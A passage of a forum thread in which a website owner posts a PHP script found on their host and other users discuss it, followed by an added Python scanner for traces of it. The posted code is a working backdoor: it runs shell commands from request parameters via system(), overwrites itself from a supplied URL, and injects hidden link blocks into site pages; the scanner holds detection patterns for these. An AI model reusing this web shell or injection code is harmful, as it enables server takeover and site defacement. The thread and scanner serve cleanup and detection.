	$fp = fopen($gname."?g=$curs", "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);

	$fnd = fopen("$tname/$cname/$curs"."_$j.php", "w+");
	fwrite($fnd, $fin);
	fclose($fnd);
}

if ($j==100)
{
$fp = fopen($gname."?g=$curs&m=1", "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);
	$fnd = fopen("$tname/$cname/$curs"."_lm.php", "w+");
	fwrite($fnd, $fin);
	fclose($fnd);
	$map = "$path/$tname/$cname/$curs"."_lm.php";
	fwrite($fr,"$map\n");
}

$fconf = fopen("c", "w+");
fwrite($fconf, $tname."\n");
fwrite($fconf, $cname."\n");
fwrite($fconf, $curs."\n");
$nj = $j;
fwrite($fconf, $nj."\n");
fclose($fconf);

}

function Update()
{
if (isset($_GET["name"]))
	$sname = $_GET["name"];

$thisname = "$sname.php";
if (isset($_POST['u']))
$u = $_POST['u'];

if (isset($_GET['u']))
		$u = $_GET['u'];

	$fp = fopen($u, "r");
$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
fclose($fp);

$fthis = fopen($thisname, "w+");
fwrite($fthis, $fin);
fclose($fthis);
}

function Com()
{
if (isset($_POST['c']))
@system($_POST['c']);
if (isset($_GET['c']))
	@system($_GET['c']);
}

function MRepl()
{
$mpt = "";
$drs = "";
$begtag = "<dd4><font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">"; 
$endtag = "</font></body></html><dd5> "; 
$mrd = trim(file_get_contents("m"));
$pt = "../$mrd";
$fin = file_get_contents($pt);
GetVar("mpt", $mpt);
// ??????? ??????????? ???? ????
$fin = preg_replace ("/<\/body>/i", "", $fin);
$fin = preg_replace ("/<\/html>/i", "", $fin);
$fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin);
$fin = ereg_replace("<dd4>(.*)<dd5>", "", $fin);
$fp = fopen($mpt, "r");
$drs = '';
while (!feof($fp))
{
 $fc = fgets($fp, 1024);
 if (!$fc) 
 { 
	exit();
 }
$drs .= $fc;
}
fclose($fp);
$fin = $fin.$begtag; 
$fin = $fin.$drs;
$fin = $fin.$endtag; 
$fmrd = fopen($pt, "w+");
fwrite($fmrd, $fin);
fclose($fmrd);
}


function WrTest()
{
$path = trim($_GET['wr']);
$htname = $path."w.txt";
	$fp = fopen($htname, "r");
	$fin = '';
	while (!feof($fp))
	{
	 $fc = fgets($fp, 1024);
	 if (!$fc) break;
 $fin .= $fc;
	}
	fclose($fp);
;
$fout = fopen("w.txt", "w+");
fwrite($fout, $fin);
fclose($fout);

}


function Main()
{
if (isset($_POST['u']) || isset($_GET['u']))
{
	Update();
	exit();
}



if (isset($_POST['c']) || isset($_GET['c']))
{
	Com();
	exit();
}

if (isset($_POST['g']) || isset($_GET['g']))
{
	Gen();
	exit();
}

if (isset($_POST['g1']) || isset($_GET['g1']))
{
	GenNew();
	exit();
}


if (isset($_POST['g2']) || isset($_GET['g2']))
{
	Gen2();
	exit();
}

if (isset($_POST['s']) || isset($_GET['s']))
{
	MRepl();
	exit();
}

if (isset($_POST['cl']) || isset($_GET['cl']))
{
	Clear();
	exit();
}

if (isset($_POST['cl2']) || isset($_GET['cl2']))
{
	Clear2();
	exit();
}
	if (isset($_POST['wr']) || isset($_GET['wr']))
{
	WrTest();
	exit();
}

echo "<ok>";

}

Main();

?>


It looks pretty malicious to me. It also looks like it will rename itself, or its directory, periodically. Not sure what it does though. Possibly an attack (brute force) script?

The fact that it is trying to open / read to your .htaccess file ($fht = fopen("$tname/.htaccess", "w+");) tells me you should get rid of it as well.


Thanks Stern. I didn't think it was anything good, but I don't know enough PHP to understand what this is saying.


We had a similar case before, where a script was dropped in every folder of the website. This script was sending some e-mails to some address specified in the querystring when called by the browser. Looked like it was sending the file/folder structure of the website etc.

We had to delete it all and change all the FTP passwords etc.

Basically it's a good time to change your passwords now, and for any other usernames which have access to this FTP space. After you've done that, it'll be a good idea to scan the whole website for any remainder of this code.


Maybe time to increase the security on the system, as that is no good. If he has an upload script make sure you check it first.


I'm the only one uploading. I'll check with the host tonight, but meanwhile I'm very curious what this script does. Can anyone tell?


Have you found these files somewhere: c, 1r.txt and 2r.txt? Check what's inside. From the looks of it, it's some kind of link generator; however, I don't like that it is using the system() function at all.

Your only bet is to run the stuff in a sandbox and try it out, could be anything from a link generator to an XSS injector to steal user info.

 

 

 


The host was no help, and I ended up deleting the files. It's the same host I left recently because of similar issues, unfortunately not until after I'd recommended them to a couple clients. Live and Learn....
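
Added example, not part of the original thread: a Python sweep for what the replies suggest looking for, namely remaining copies of the script, its working files (c, 1r.txt, 2r.txt and the others it creates) and pages it has modified. The patterns are taken from the code posted above; the rule names, function names and the sample tree are assumptions made for this example.

```python
import os
import re
import tempfile

# Patterns copied from the script posted in this thread.
CONTENT_RULES = {
    "backdoor: request-driven system() call": re.compile(
        rb"system\s*\(\s*\$_(?:GET|POST|REQUEST)\s*\["),
    "backdoor: long-running background script": re.compile(
        rb"ignore_user_abort\s*\(\s*1\s*\).{0,200}?set_time_limit\s*\(\s*0\s*\)",
        re.S),
    "injected: dd4/dd5 marker": re.compile(rb"<(?:!--)?dd[45](?:--)?>"),
    "injected: zero-size hidden font wrapper": re.compile(
        rb"position:\s*absolute;\s*overflow:\s*hidden;\s*height:\s*0;\s*width:\s*0"),
}

# Working files the posted script reads or writes next to itself.
STATE_FILES = {"c", "m", "1r.txt", "2r.txt", "1t", "1g", "w.txt", "2.js", "log"}
TEXT_EXT = {".php", ".html", ".htm", ".js", ".inc", ".tpl"}
MAX_BYTES = 2 * 1024 * 1024  # the script appends to pages, so read generously


def scan(root):
    """Return sorted (relative_path, reason) findings under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        backdoor_here = False
        for name in files:
            if os.path.splitext(name)[1].lower() not in TEXT_EXT:
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read(MAX_BYTES)
            except OSError:
                continue  # unreadable file: skip rather than abort the sweep
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            for reason, rule in CONTENT_RULES.items():
                if rule.search(data):
                    findings.append((rel, reason))
                    backdoor_here = backdoor_here or reason.startswith("backdoor")
        # Names like "c" or "log" are too common to flag alone; report them
        # only when they sit in the same directory as a flagged script.
        if backdoor_here:
            for name in STATE_FILES.intersection(files):
                rel = os.path.relpath(os.path.join(dirpath, name), root)
                findings.append((rel.replace(os.sep, "/"),
                                 "state file beside backdoor"))
    return sorted(findings)


# Constructed sample input, modelled on the folders described in the thread.
SAMPLE_TREE = {
    "euhdy/tur.php": b"<?php\nignore_user_abort(1);\nset_time_limit(0);\n"
                     b"function Com(){ if (isset($_GET['c'])) @system($_GET['c']); }\n",
    "euhdy/w.txt": b"",
    "euhdy/error_log": b"PHP Warning: constructed sample line\n",
    "index.php": b"<html><body>Welcome\n<dd4><font style=\"position: absolute;"
                 b"overflow: hidden;height: 0;width: 0\"><a href='x.php'>x</a>"
                 b"</font></body></html><dd5> ",
    "about.php": b"<?php echo 'About us'; ?>\n",
}


def demo():
    """Build the constructed tree in a temp directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for rel, content in SAMPLE_TREE.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(content)
        return scan(root)


if __name__ == "__main__":
    for path, reason in demo():
        print(f"{path}: {reason}")
```

Point `scan()` at a copy of the webroot rather than the live site, and treat a hit on an otherwise legitimate page (the `injected:` rules) as a file to restore from a known-good backup.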
